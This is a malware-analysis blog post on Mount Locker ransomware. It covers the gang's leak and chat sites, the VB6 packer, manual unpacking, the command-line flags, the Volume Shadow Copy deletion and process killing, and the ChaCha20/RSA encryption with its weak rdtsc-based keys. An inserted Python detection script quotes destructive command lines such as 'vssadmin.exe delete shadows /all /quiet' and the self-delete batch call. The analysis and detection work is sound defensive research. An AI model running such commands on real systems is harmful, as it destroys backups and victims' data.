<h1><strong>Between a rock and a hard place - Exploring Mount Locker Ransomware</strong></h1>
<p>f0wL, 2020-12-23, Dissecting Malware (https://dissectingmalwa.re/between-a-rock-and-a-hard-place-exploring-mount-locker-ransomware.html)</p>
<p>This time we will be analyzing Mount Locker, a relatively new Ransomware strain that appeared in the second half of 2020. This blog post will detail the initial Analysis, Unpacking and Static + Dynamic Analysis of samples belonging to the second iteration of the Malware.</p><p><br></p>
<p>Hey there, long time no blog post :D It's not like I haven't been doing any research the last couple of months, but between the whole Covid-19 Situation, University work and everything else there was either too little time to finish the posts I started or I came up with multiple smaller things like my <a href="https://github.com/f0wl/configwalker">Netwalker Config Extractor</a> that would not justify a dedicated blog article (I normally dump stuff like this on Twitter instead).</p>
<p><center><img alt="Logo" src="https://dissectingmalwa.re/img/mount-title.jpg"></center></p>
<p><br></p>
<p>Anyway, I wanted to get at least one more Blogpost out before 2020 comes to an end. This time I will be looking at "Mount Locker", yet another Double Extortion Ransomware (as a Service) that is targeting Microsoft Windows. The goals of this article are:</p>
<ul>
<li>Highlight the Unpacking of the samples</li>
<li>A bit more debugging, something that my older posts lack</li>
<li>A walkthrough of the cryptographic functions</li>
<li>A quality Yara Rule</li>
</ul>
<p><br></p>
<p>Back in September NHS Digital already released an <a href="https://digital.nhs.uk/cyber-alerts/2020/cc-3624">alert</a> for Mount Locker dating its first appearance to July 2020. Although they do not state a delivery method, at the moment access through stolen Credentials and Remote Management is very likely. The Advisory also features very solid remediation advice.</p>
<p><br></p>
<p><center><img alt="NHS" src="https://dissectingmalwa.re/img/mount-nhs.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>News & Leak Sites</strong></h1>
<p>Since we are talking about Double-Extortion Ransomware here, Mount Locker of course runs its own Leak Site. It is available via Tor only and features a Home page, a contact form and a blog-style listing of the companies they compromised and stole data from.</p>
<p><center><img alt="News" src="https://dissectingmalwa.re/img/mount-news.png"></center></p>
<p><br></p>
<p>Next, let's have a look at how they communicate with their victims. All of the dropped HTML Ransomnotes contain a unique-per-sample onion URL with a live chat. If you browse to this Tor site without specifying the Client ID (the <em>/?cid=</em> parameter) you will end up at the login prompt shown below (victims don't get a password and leaving the input field blank does not work, so this might only work for operators/affiliates?). I went ahead and removed the Client IDs from all screenshots to not lower the bar for people trying to mess with the chat in any way. Same with the additional contact E-Mail addresses that were found in two of the sample Ransomnotes, which follow the pattern <em>firstnameLastname[year/integers]@protonmail.com</em>.</p>
<p><br></p>
<p><center><img alt="Login" src="https://dissectingmalwa.re/img/mount-login.png"></center></p>
<p><br></p>
<p>I will include two of the support chat logs as well, because they allow for a few interesting insights into how Mount Locker attacks work. In the Screenshot below you can see a monologue by the Mount Locker Operators. They obviously really like playing the "Tech Support" role, since they open up the conversation with "We are ready to help you. What are your problems?". After over a week with no reply from the victim they try to contact them again by addressing the message directly to an employee (name redacted, classic scare tactic). It's unclear how they got the name, but my guess is they either gained access via Malspam or remote access to the employee's account.</p>
<p><br></p>
<p><center><img alt="Chat 1" src="https://dissectingmalwa.re/img/mount-chat1.png"></center></p>
<p><br></p>
<p>In the second case the conversation went on for much longer. This time the victim more or less confirms that the affected server was compromised through internet-exposed Remote Access. Upon being asked for a decryption price they return with a price of 10 BTC. If this is their default price for an individual they likely won't get anywhere with their ransom demands, since BTC is at an all-time high as well. The criminals later discount this price to 5 BTC, which is still too much, and the victim decides not to pay (good choice).</p>
<p><br></p>
<p><center><img width="75%" height="75%" alt="Chat 2" src="https://dissectingmalwa.re/img/mount-chat2.png"></center></p>
<p><br></p>
<p>Just for fun I took a quick look at their site's code and noticed their 404 page displayed the nginx version in use. Both of the chat portals from Mount Locker Version 2 (we'll come to the specifics later) likely use nginx 1.14.2. Would you like to take a guess when that version was released? How does <a href="https://nginx.org/en/CHANGES-1.14">over 2 years ago (04.12.2018)</a> sound? Their main Leak site does not display a version number, but I guess they really prefer legacy stuff.</p>
<p><center><img alt="Nginx" src="https://dissectingmalwa.re/img/mount-nginx.png"></center></p>
<p><br></p>
<h1><strong>Initial Analysis</strong></h1>
<p><br> </p>
<p>Both of the samples I will be focusing on in this post belong to "Version 2" of Mount Locker: since the initial Version of the Ransomware turned up in Sandboxes and Analysis platforms, the operators of the campaign have made some major changes.</p>
<p><br></p>
<h3><strong>Sample 1</strong></h3>
<div class="highlight"><pre>filename: BreakOut.exe, XACQDAPEV.exe
filesize: 200KB
sha-256: 226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2
ssdeep: 1536:ssBoz9GFuIdclwKfVPoawSL20mRbg2DrE1mHkrY0f3r6fR0ZzDWR+3itGSh6ZVvg:ssS3oifBoaXhDWA4G3eeJaeIbmC00
VT First Submission: 11.11.2020 15:26:06
</pre></div>
<p>Download: <a href="https://app.any.run/tasks/5dc7dca9-187c-498e-b557-87490c4723be/">AnyRun</a> | <a href="https://bazaar.abuse.ch/sample/226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2/">Malware Bazaar</a> | <a href="https://www.virustotal.com/gui/file/226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2/detection">VirusTotal</a> | <a href="https://www.hybrid-analysis.com/sample/226a723ffb4a91d9950a8b266167c5b354ab0db1dc225578494917fe53867ef2/5fb753492b71205a9f5af90a">HybridAnalysis</a></p>
<h3><strong>Sample 2</strong></h3>
<div class="highlight"><pre>filename: QuantumQuditSimulator.exe
filesize: 532KB
sha-256: e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037
ssdeep: 6144:Q5fW8eILySdSS4JoHjnJVZJQQIreKsuKu3a2WQe0gz+Y:OeILzSS5jnJ/JTu3zWtqY
VT First Submission: 18.11.2020 19:33:26
</pre></div>
<p>Download: <a href="https://app.any.run/tasks/552dc97d-6a27-4f52-8d92-0542b3e5cfc8/">AnyRun</a> | <a href="https://bazaar.abuse.ch/sample/e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037/">Malware Bazaar</a> | <a href="https://www.virustotal.com/gui/file/e7c277aae66085f1e0c4789fe51cac50e3ea86d79c8a242ffc066ed0b0548037/detection">VirusTotal</a> | HybridAnalysis: unavailable</p>
<p><br></p>
<p>As always we'll start out with a quick look at Detect It Easy to see what we are working with. In both cases it detects Visual Basic 6, yay! Checking the imports to be sure: yep, the only Library we see is <em>MSVBVM60.DLL</em>, the Microsoft Visual Basic Virtual Machine (yo dawg, heard you like virtual things :D). Although the entropy graph didn't directly indicate a packer, I doubt that a serious RaaS Group would write Ransomware in VB.6 these days.</p>
<p><center><img alt="Detect it easy, packed" src="https://dissectingmalwa.re/img/mount-die1.png"></center></p>
<p><br></p>
<p>The next step is to check out the Resources with Resource Hacker. Let's start off with one of the embedded String Tables. The marked function names are definitely a red flag and indicate that this is in fact a VB.6 packer.</p>
<p><br></p>
<p><center><img alt="Stringtable" src="https://dissectingmalwa.re/img/mount-stringtable.png"></center></p>
<p><br></p>
<p>The second curious thing is a PE File! But wait, take a closer look. There is something wrong with the DOS and Rich Header. The "DOS String" should normally read <em>"This program cannot be run in DOS mode."</em> whereas this one reads <em>"This!prohsam!caolpt be tum gm DOS kndc."</em>. Looks like some of the characters were shifted by one and then a few were skipped. But instead of figuring it out by hand we'll take a look at the code next and unpack it, since this is just a diversion after all.</p>
<p><br></p>
<p><center><img alt="ResourcePE" src="https://dissectingmalwa.re/img/mount-resPE.png"></center></p>
<p><br></p>
<p>Because VB.6 looks absolutely horrendous in IDA or Ghidra we'll have to use a more specialized tool, <a href="https://www.vb-decompiler.org/">VB.Decompiler Pro</a> in this case. Upon opening the samples with it we notice that most of the implemented functions are dead code. This is also apparent when we look into the GUI Designer (see below), because there is a Graphical User Interface that we never get to see upon running it in a Sandbox. Sample 1 seems to be a game called "Break-Out" and Sample 2 is called "Quantum Qudit Simulator", some kind of calculation program from the National University of Ireland. Of course both of the Developers of the original applications do not have anything to do with Mount Locker Ransomware, because these samples were obviously altered to act as a packer for it. Even after a lot of search engine magic I couldn't find out where they got these programs from, but if you find them anywhere let me know!</p>
<p><br></p>
<p><center><img alt="Backdoored Programs" src="https://dissectingmalwa.re/img/mount-backdooredProgs.png"></center></p>
<p><br></p>
<p>Now let's look at some decompiled VB.6 code! The API declarations below basically reveal what we already saw in the string table in the resources.</p>
<p><br></p>
<p><center><img alt="API" src="https://dissectingmalwa.re/img/mount-api.png"></center></p>
<p><br></p>
<p>I'll try to present the next lines of snuck-in code in a logical order. The first step is to load the PE resource we saw earlier.</p>
<p><br></p>
<p><center><img alt="Resource" src="https://dissectingmalwa.re/img/mount-loadres.png"></center></p>
<p><br></p>
<p>Up next is a long boi call to <em>VirtualAlloc</em> (sorry if the font in the screenshot is a bit small). Also take note of the variable names like <em>var_804C</em> (which sometimes indicates this code was inserted at a later date) and the obfuscation of the arguments to VirtualAlloc.</p>
<p><br></p>
<p><center><img alt="VirtualAllocate" src="https://dissectingmalwa.re/img/mount-virtualalloc.png"></center></p>
<p><br></p>
<p>Last but not least we have a call to <em>VirtualProtect</em> and <em>RtlMoveMemory</em> (renamed to CopyMemory in the API Declarations above), again with the same obfuscation, to change the protection of the allocated Region in memory and move the payload there. This is as far as we are going to look into this right now though, since this is just supposed to be a quick look into this "backdoored" application and we'll continue by unpacking the Ransomware sample now.</p>
<p><br></p>
<p><center><img alt="VirtualProtect" src="https://dissectingmalwa.re/img/mount-vprot.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>Unpacking</strong></h1>
<p>Since I'm pretty lazy and a big fan of <a href="https://www.youtube.com/channel/UC--DwaiMV-jtO-6EvmKOnqg">Open Analysis Live</a> I thought I'd give <a href="https://www.unpac.me/">Unpac.me</a> a chance at this packer first. Unfortunately something went wrong here (I did not expect more than one Child Binary), but that has to be expected since Classifier Issues with VB.6 Code are one of the Challenges that they are still working on.</p>
<p><center><img width="80%" height="80%" alt="Unpacme" src="https://dissectingmalwa.re/img/mount-unpac.png"></center></p>
<p><br></p>
<p>That should not deter us from unpacking it manually though! The easiest and fastest way would be to set a breakpoint on <em>CreateProcessInternalW</em> and dump it from there if applicable.</p>
<p><center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/DIH4SvKuktM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center>
<br></p>
<p>Again, sadly this does not do what we want here. Apparently this sample utilizes Self-Injection, so the call to <em>CreateProcessInternalW</em> won't take us to the unpacked Child Process but rather to a Powershell script. This seems to be part of the actual Ransomware rather than the packer, so we are too far in already.</p>
<p><br></p>
<p><center><img alt="CreateProcessInternalW" src="https://dissectingmalwa.re/img/mount-cpi.png"></center></p>
<p><br></p>
<p>I'll have to do it the old-fashioned way then. One Breakpoint on <em>VirtualProtect</em> and one on the Return from <em>VirtualAlloc</em>. For good luck I'll also throw in one on <em>IsDebuggerPresent</em>.</p>
<p><br></p>
<p><center><img alt="Breakpoints" src="https://dissectingmalwa.re/img/mount-breakpoints.png"></center></p>
<p><br></p>
<p>Turns out altering the return value of <em>IsDebuggerPresent</em> is not necessary for Sample 1, it just unpacks the child regardless. Sample 2 on the other hand will throw an error message and terminate.</p>
<p><br></p>
<p><center><img alt="DebuggerPresent" src="https://dissectingmalwa.re/img/mount-debuggerpresent.png"></center></p>
<p><br></p>
<p>The disadvantage of breaking on <em>VirtualProtect</em> or <em>VirtualAlloc</em> in the case of VB.6 is that the Microsoft Visual Basic Virtual Machine calls both of them multiple times in the setup process. Instead of "Following in Dump" every time we hit a breakpoint it is far easier to just look for the jump to the unpacked PE. The fastest way to get there is placing a breakpoint on <em>VirtualFree</em>, which (at least in the case of these two samples) is called right before the function call that jumps into said Ransomware PE. Once you are there, step into the function and follow the address in <em>jmp ecx</em> to find the unpacked sample. Below I also included a screenshot (green border, blue/white font) of the packed sample in a hex-editor to show that the binaries actually differ.</p>
<p><br></p>
<p><center><img alt="Bin" src="https://dissectingmalwa.re/img/mount-bin.png"></center></p>
<p><br></p>
<p>A quick look at the memory map before we'll dump the segment and go right ahead.</p>
<p><center><img alt="Memory-Map" src="https://dissectingmalwa.re/img/mount-memorymap.png"></center></p>
<p><br></p>
<p>Of course the first thing after dumping the binary for me is to throw it into PE-Bear. Looks like it is still in its mapped state, so let's continue by unmapping it. (Screenshot: left = mapped, right = unmapped)</p>
<p><center><img alt="Sections" src="https://dissectingmalwa.re/img/mount-sections.png"></center></p>
<p><br></p>
<p>One more thing: Don't forget to adjust the Image Base or your Disassembly/Decompilation results will look like garbage. Ask me how I know.</p>
<p><center><img width="80%" height="80%" alt="Image Base Adjustment" src="https://dissectingmalwa.re/img/mount-imagebase.png"></center></p>
<p><br></p>
<p>Just to verify that we (likely) don't have another packed stage here I'll take a look at it with Detect It Easy. Seems good, let's continue with Static Analysis!</p>
<p><center><img width="80%" height="80%" alt="Detect it easy, unpacked" src="https://dissectingmalwa.re/img/mount-dieUnpacked.png"></center></p>
<p><br></p>
<h1><strong>Static Analysis</strong></h1>
<p><br></p>
<p>First let's check the compiler timestamps on the samples we have. Both x86 binaries contain the same one from <em>November 6th 2020 10:47:05 UTC</em>. Interestingly the x64 Version was (allegedly) compiled just one second earlier.</p>
<p><center><img width="70%" height="70%" alt="Compile Time" src="https://dissectingmalwa.re/img/mount-compiletime.png"></center></p>
<p><br></p>
<p>To make a list of what to expect from this Ransomware I would normally go through the Imports and make some more or less educated guesses about what it would do with those functions, but this is again a perfect opportunity to try out a new tool: <strong>capa</strong> by FireEye. It was released about 6 months ago and it looks like I've been really missing out. As you can see below I made one minor correction after I finished the analysis, but besides that the tool is pretty spot on and will definitely save you some time in triage-like situations.</p>
<p><br></p>
<p><center><img alt="capa" src="https://dissectingmalwa.re/img/mount-capa.png"></center></p>
<p><br></p>
<p>Because it will be easier to "navigate" the functions of the Ransomware if you know in what context and point in time the log messages are printed I extracted them all. Quite interesting to see this level of verbosity in a Ransomware strain that has been deployed in a few attacks already in the last months. It will become even more apparent in the course of this analysis, but the developers are obviously still trying to figure things out.</p>
<p><br></p>
<p><center><img alt="Logging" src="https://dissectingmalwa.re/img/mount-logging.png"></center></p>
<p><br></p>
<p>Alright, enough fooling around, let's dive in! Ghidra 9.2 is the tool of choice this time around since I wanted the comfort of a decompiler. To start off I took a look at it function-by-function and renamed them to reflect what each one of them does. The following screenshots will show most of the peripheral functions and setup-related things. The Crypto functions will be discussed in a separate chapter. Something to watch out for: there is quite a lot of variable re-use happening in certain functions, so I either renamed the variable to something that would reflect the value it was assigned last or I kept the original name generated by the decompiler to avoid confusion.</p>
<p><br></p>
<p><center><img width="60%" height="60%" alt="Functions" src="https://dissectingmalwa.re/img/mount-functions.png"></center></p>
<p><br></p>
<p>We'll start at the entrypoint. From here the sample branches off into two functions: <em>mw_getArguments</em> will handle, as the name suggests, the arguments given by the operator and <em>mw_mainLockRoutine</em> from where multiple peripheral functions are called.</p>
<p><br></p>
<p><center><img alt="Arguments" src="https://dissectingmalwa.re/img/mount-entry.png"></center></p>
<p><br></p>
<p>The fact that the Ransomware sample accepts commandline arguments supports the assumption that Mount Locker is designed to be manually operated by criminals. The screenshot below depicts the function <em>mw_getArguments</em> that handles the supplied commandline options:</p>
<ul>
<li>/log: --> can be used with 'F' or 'C' to write a Log to a File or Console respectively</li>
<li>/scan: --> valid options: L | N | S, scan attached drives where L = Local Drive, N = Network Drive, S = Network Share</li>
<li>/marker: --> create a specified marker file on each volume to be encrypted</li>
<li>/nodel: --> do not delete the Ransomware binary after execution</li>
</ul>
<p><br></p>
<p><center><img alt="Arguments" src="https://dissectingmalwa.re/img/mount-arguments.png"></center></p>
<p><br></p>
<p>The third function we will take a look at is what I would call the "Main Routine". From here a lot of substantial functions of the Ransomware are called. After allocating the debug console (if the argument flag was set) it will check if a Mutex from another Mount Locker process was already set. Before the actual file encryption functions are called it will delete the Volume Shadow Copies and terminate running processes.</p>
<p><br></p>
<p><center><img alt="Mainroutine" src="https://dissectingmalwa.re/img/mount-mainroutine.png"></center></p>
<p><br></p>
<p><strong>1)</strong> To make sure the Ransomware only runs once on a particular system it will create a Mutex that is derived from the Volume Serial Number of the System Drive, e.g. <em>1AB6AEEA4356D5DDA86ADABB750D5B57</em>. If it fails to retrieve the Serial Number via <em>GetVolumeInformationW</em> it will default to a Backup value, <em>0x41a207bd</em>, which is permuted in the same way. Should <em>CreateMutexW</em> fail and return NULL or System Error 0xb7 (ERROR_ALREADY_EXISTS), the <em>mw_mutex</em> function returns <em>false</em>, writes an error message to the log and the Ransomware will terminate. Otherwise the function will return <em>true</em> and the execution continues.</p>
<p><br></p>
<p><center><img alt="Mutex" src="https://dissectingmalwa.re/img/mount-mutex.png"></center></p>
<p><br></p>
<p><strong>2)</strong> Up next we have a Powershell script that is written to %temp% (Path via <em>GetTempPath</em>) with the Filename determined via <em>GetTickCount</em> and the extension <em>.tmp</em>. In the next step we'll check what it actually does.
<br></p>
<p><center><img alt="Powershell Function" src="https://dissectingmalwa.re/img/mount-ps1Func.png"></center></p>
<p><br></p>
<p>For decoding and decompressing the Powershell script the most popular tool is of course CyberChef. Because I like to try out new/alternative tools we'll use Binary Refinery today! It is a great substitute for CyberChef in Malware Analysis/Triage situations and you can also use it as a Library for your Python projects / tools. And don't forget about the extra street cred for using a CLI tool. As you can see in the screenshot below the first half of the Powershell script is used to delete the Volume Shadow Copies via <em>vssadmin.exe</em> and to stop all services that don't run from the Windows System Directory.</p>
<p><br></p>
<p><center><img alt="Cyberchef" src="https://dissectingmalwa.re/img/mount-binref.png"></center></p>
<p><br></p>
<p>I shortened the process exception list, but in total it contains 657 filenames of Webbrowsers, System Tools, a lot of Anti-Virus and EDR Clients and even <em>ollydbg.exe</em>, how nice of them! (or maybe they use it internally for debugging?). Every process running on the system that does not belong to the Ransomware, is not run from the Windows directory and is not on the Exception List will be terminated.</p>
<p><center><img alt="Process Kill" src="https://dissectingmalwa.re/img/mount-processKill.png"></center></p>
<p><br></p>
<p><strong>3)</strong> In line with their verbose logging functionality Mount Locker will separate its log output by the volume type of the targeted drive. The interesting "discovery" in this case is that the encryption of Network Shares is not supported yet and therefore Mount Locker won't proceed with file encryption on such volumes.</p>
<p><br></p>
<p><center><img alt="Network Share" src="https://dissectingmalwa.re/img/mount-netLock.png"></center></p>
<p><br></p>
<p>The Log strings in <em>mw_lockerDirCheck</em> also allow for interesting insights into (upcoming) features. For one they are messing around with NTFS Reparse Points, which is rarely seen in Malware, and log messages like "[OK] locker.dir.check > target_hidden" indicate that they are also trying to attack hidden directories.</p>
<p><br></p>
<p><center><img alt="ClientID" src="https://dissectingmalwa.re/img/mount-dirCheck.png"></center></p>
<p><br></p>
<p>The generation of the ClientID is based on the return of <em>GetComputerName</em> which is used with a 32 character hardcoded string to compute the 64 character long ClientID String found in the Ransomnote.</p>
<p><br></p>
<p><center><img alt="ClientID" src="https://dissectingmalwa.re/img/mount-clientID.png"></center></p>
<p><br></p>
<p>Mount Locker ships with a list of Directory Paths and extensions to be spared from encryption to keep the Operating System ... operational. We'll see in the dynamic Analysis Chapter how well that actually works.</p>
<p><br></p>
<p><center><img width="60%" height="60%" alt="Directories" src="https://dissectingmalwa.re/img/mount-dirs.png"></center></p>
<p><br></p>
<p>To constantly remind the victims of the Ransom and increase psychological pressure Mount Locker registers the Ransomnote to be opened when the user tries to access an encrypted file. The lower screenshot is taken from the Hatching Tria.ge Report for Sample 2 which you can find <a href="https://tria.ge/201121-c152v5zkxx/behavioral1#report">here</a>.</p>
<p><br></p>
<p><center><img alt="Registry" src="https://dissectingmalwa.re/img/mount-shellopen.png"></center></p>
<p><br></p>
<p>The second file that is written to %temp% during the execution of Mount Locker is yet another one with its name derived from the return value of <em>GetTickCount</em>. After the Ransomware has finished the encryption routine, and if the <em>/nodel</em> flag was not supplied, it's time to clean up and Mount Locker will delete itself by invoking e.g. <code>cmd /c "C:\Users\admin\AppData\Local\Temp\\0F7565F4.bat" "C:\Users\admin\Desktop\mountlocker.exe"</code>.</p>
<p><br></p>
<p><center><img alt="BAT File" src="https://dissectingmalwa.re/img/mount-bat.png"></center></p>
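<p>As an added example (my code, not the post's and not anything taken from Mount Locker), here is a small detection pass in Python over constructed process-creation events for three of the host behaviours described above: the shadow copy deletion via <em>vssadmin.exe</em> from the dropped Powershell script, that script living in %temp% under a GetTickCount-derived name with a <em>.tmp</em> extension, and the <em>cmd /c "&lt;temp&gt;\&lt;name&gt;.bat" "&lt;sample&gt;.exe"</em> self-delete. The field names mimic Sysmon Event ID 1 but the events are made up; the exact Powershell command line is not shown in the post, so that rule only keys on the Temp path and extension.</p>

```python
import re

# A GetTickCount-derived file name is a 32-bit value, i.e. up to 8 hex digits,
# as in the 0F7565F4.bat example from the post. Matching "\Temp\" followed by
# exactly 8 hex digits is my assumption, not a documented naming rule.
TEMP_TICK_TMP = re.compile(r"\\Temp\\+[0-9A-F]{8}\.tmp\b", re.I)
SELF_DELETE_CMD = re.compile(
    r'cmd(?:\.exe)?\s+/c\s+"[^"]*\\Temp\\+[0-9A-F]{8}\.bat"\s+"[^"]*\.exe"', re.I)
SHADOW_DELETE = re.compile(r"\bdelete\b.*\bshadows\b", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_shadow_copy_delete(ev):
    """vssadmin.exe deleting shadow copies (done by the dropped PowerShell script)."""
    return (_basename(ev["Image"]) == "vssadmin.exe"
            and SHADOW_DELETE.search(ev["CommandLine"]) is not None)


def rule_temp_tick_powershell(ev):
    """powershell.exe referencing a %TEMP%\\<8 hex digits>.tmp script."""
    return (_basename(ev["Image"]) == "powershell.exe"
            and TEMP_TICK_TMP.search(ev["CommandLine"]) is not None)


def rule_self_delete_batch(ev):
    """cmd /c "<TEMP>\\<8 hex digits>.bat" "<payload>.exe": the post-encryption self-delete."""
    return (_basename(ev["Image"]) == "cmd.exe"
            and SELF_DELETE_CMD.search(ev["CommandLine"]) is not None)


RULES = {
    "shadow_copy_delete": rule_shadow_copy_delete,
    "temp_tick_powershell": rule_temp_tick_powershell,
    "self_delete_batch": rule_self_delete_batch,
}


def detect(events):
    """Map every host seen in `events` to the sorted list of rule names that fired on it."""
    hits = {}
    for ev in events:
        names = hits.setdefault(ev["host"], set())
        for name, rule in RULES.items():
            if rule(ev):
                names.add(name)
    return {host: sorted(names) for host, names in hits.items()}


def triage(events, min_rules=2):
    """Hosts on which at least `min_rules` different behaviours were observed."""
    return sorted(h for h, names in detect(events).items() if len(names) >= min_rules)


# Constructed events: WS01 shows the full chain, WS02 only benign look-alikes
# (a vssadmin listing and a batch file without a tick-count name).
EVENTS = [
    {"host": "WS01", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -File "C:\Users\admin\AppData\Local\Temp\0F7565F3.tmp"'},
    {"host": "WS01", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "C:\Users\admin\AppData\Local\Temp\\0F7565F4.bat" "C:\Users\admin\Desktop\mountlocker.exe"'},
    {"host": "WS02", "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe list shadows"},
    {"host": "WS02", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c "C:\Users\bob\AppData\Local\Temp\setup_123.bat"'},
]

if __name__ == "__main__":
    for host, names in detect(EVENTS).items():
        print(host, names)
    print("triage:", triage(EVENTS))
```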
<p><br></p>
<p><br></p>
<h1><strong>Cryptographic Functions</strong></h1>
<p><br></p>
<p>Another useful Tool for Ransomware Analysis is PEiD with the KANAL plugin. KANAL is short for "Krypto Analyzer" and tries to detect crypto algorithms, functions and constants. In the case of Mount Locker it only recognizes the RSA Public Key import via the WinCrypt API.</p>
<p><center><img height="75%" width="75%" alt="KANAL" src="https://dissectingmalwa.re/img/mount-kanal.png"></center></p>
<p><br></p>
<p>As the function name suggests <em>mw_importPubkey</em> imports the RSA Public Key that is embedded into the binary. This function also generates the Session Key used with ChaCha20 via <em>__rdtsc</em> + <em>Sleep</em> (more on that later), which is encrypted with the RSA Public Key using <em>CryptEncrypt</em>. Once that is done the ClientID will be generated and the Ransomnote is registered to be opened with the file extension of the Ransomware.</p>
<p><br></p>
<p><center><img alt="RSA Routine" src="https://dissectingmalwa.re/img/mount-importPubkey.png"></center></p>
<p><br></p>
<p>To take a closer look at the supplied RSA Public Keys I dumped them from both samples with x32dbg.</p>
<p><br></p>
<p><center><img height="85%" width="85%" alt="RSA" src="https://dissectingmalwa.re/img/mount-rsa.png"></center></p>
<p><br></p>
<p>Just as a quick "sanity check": Yes, the Public RSA Keys differ between the samples. It wouldn't be the first time that lazy Ransomware operators reused the same RSA Keypair in multiple samples, so I think it's worth checking at least.</p>
<p><br></p>
<p><center><img width="70%" height="70%" alt="RSA" src="https://dissectingmalwa.re/img/mount-pubkeys.png"></center></p>
<p><br></p>
<p>In the screenshot below we see the ChaCha20 Block function which is an important component of the Algorithm. It can be identified by the <em>expand 32-byte k</em> magic value.</p>
<p><br></p>
<p><center><img alt="ChaCha20 Block" src="https://dissectingmalwa.re/img/mount-chacha20block.png"></center></p>
<p><br></p>
<p><br></p>
<p>Since the folks at <a href="https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates">Blackberry ThreatVector</a> already spilled the beans, I'll mention it here as well. Instead of using a secure Random Number Generator for the File (and Session) Encryption Keys they opted to use <em>__rdtsc</em>, which returns the processor time stamp (clock cycles since the last reset), combined with a Sleep call. The Time Stamp Counter is a bad way to generate encryption keys because it is a deterministic function that wraps around every ~49 days and could therefore theoretically be bruteforced (with knowledge about the point in time when <em>__rdtsc</em> was invoked; the Sleep call would be used to "obfuscate" this). This is nothing new though, and with the coverage Mount Locker has received up until now I expect this issue to be fixed by the next version.</p>
<p><br></p>
<p><center><img alt="rdtsc" src="https://dissectingmalwa.re/img/mount-rdtsc.png"></center></p>
<p><br></p>
<p>I don't want to throw shade here, but I'm not a fan of detailing Cryptobugs in ongoing Ransomware campaigns. The use of GetTickCount (__rdtsc) isn't a huge flaw in itself, but it could very well come in handy if there were more flaws in the crypto-implementation used. I strongly recommend watching <a href="https://twitter.com/PolarToffee">@Polartoffee's</a> Talk from SteelCon 2019 where this is addressed as well (the video below is timestamped for your convenience):</p>
<p><center><iframe width="560" height="315" src="https://www.youtube-nocookie.com/embed/XoKiBg_l4Wc?start=1383" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></center></p>
<p><br></p>
<p>Fun fact, speaking of Cryptowall: The File extension list in Mount Locker Version 1 contains about 2600 entries. It made headlines because it also targets Tax Software (which isn't a common thing, but it has been seen before on several occasions). What I find far more interesting is that they target files previously encrypted by other Ransomware strains, as you can see below:</p>
<p><br></p>
<p><center><img alt="Ransomware Extensions" src="https://dissectingmalwa.re/img/mount-cryptext.png"></center></p>
<p><br></p>
<p><em>MapViewOfFile</em> is used to map each file into memory for encryption. Smaller files are mapped according to their size; if a file is larger than <em>0x40000000</em> it is mapped and encrypted in chunks.</p>
<p><br></p>
<p><center><img alt="RWrite Keys to File" src="https://dissectingmalwa.re/img/mount-map.png"></center></p>
<p><br></p>
<p>To further investigate the File Encryption I used the classic trick of a bait file filled with null bytes to check for patterns and appended data. As we can see, the encrypted file is now 288 bytes longer. These bytes can be divided into 32 bytes for the File Key (which is, as the name suggests, unique for every file) and 256 bytes for the Session Key. Of course these keys are not prepended to the file header as-is: the File Key is encrypted with the Session Key using ChaCha20, and the Session Key is encrypted with the public RSA Key through <em>CryptEncrypt</em>.</p>
<p><br></p>
<p><center><img alt="Testfile plain" src="https://dissectingmalwa.re/img/mount-test.png"></center>
<center><img alt="Testfile encrypted" src="https://dissectingmalwa.re/img/mount-testfile.png"></center></p>
<p><br></p>
<p>This can be confirmed with Ghidra: Both encrypted keyblobs are prepended to the file with <em>WriteFile</em>.</p>
<p><br></p>
<p><center><img alt="Map File" src="https://dissectingmalwa.re/img/mount-writeKey.png"></center></p>
<p><br></p>
<p>Since most Ransomware groups don't try to reinvent the wheel when it comes to crypto implementations, they often get their inspiration from Open Source projects. I looked around Github for a while to find C++ implementations of ChaCha20 that would fit what we see in Mount Locker. The Repository linked below is just a guess at what they could have used, since it seems to be the oldest ChaCha20 C++ Repo on Github and many implementations borrow code from it. The structure and compartmentalization into functions also look very similar. Bernstein's reference implementation, for example, is constructed differently. I cross-referenced it with <a href="https://tools.ietf.org/html/rfc8439">RFC8439</a> and it looks solid at first glance. Parts of the Quarter Round mechanism and the Block function are directly copied from the Wikipedia article on Salsa20/ChaCha20 though, and the code comments are a bit too sketchy IMO.</p>
<p><br></p>
<p><center><div class="github-card" data-github="983/ChaCha20" data-width="400" data-height="150" data-theme="default"></div>
<script src="//cdn.jsdelivr.net/github-cards/latest/widget.js"></script></center></p>
<p><center><img alt="Github ChaCha20 Implementation" src="https://dissectingmalwa.re/img/mount-chachagithub.png"></center></p>
<p><br></p>
<p><br></p>
<h1><strong>Dynamic Analysis</strong></h1>
<p><br>
